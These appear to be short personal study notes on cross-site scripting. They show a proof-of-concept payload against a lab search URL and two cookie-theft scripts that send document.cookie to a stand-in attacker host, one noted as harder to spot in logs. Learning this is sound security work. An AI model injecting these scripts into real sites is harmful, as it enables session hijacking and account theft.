PROGRAMMING

  MINTE9
REMEMBERS




Last update:   10-05-2022

XSS

You can confirm most XSS vulnerability by injecting some arbitrary javascript.
 
# Vulnerability prove

https://lab.academy.net/?search=<script>print()</script>

Cookies

Stealing cookies is a traditional way to exploit XSS.
 
# Comment form not filtring output:
# A hacker can send a malicious comment, that will be viewed by all

<script> 
    document.location = 
        "https://www.hacker-site.com/?cookies="+ document.cookie; 
</script>
More subtile not detected using post and logs.
 
<script>
    fetch('https://www.hacker-site.com', {
    method: 'POST',
    mode: 'no-cors',
    body: document.cookie
});
</script>

Questions    
Filter input
        A B C D E F
🔔
1/1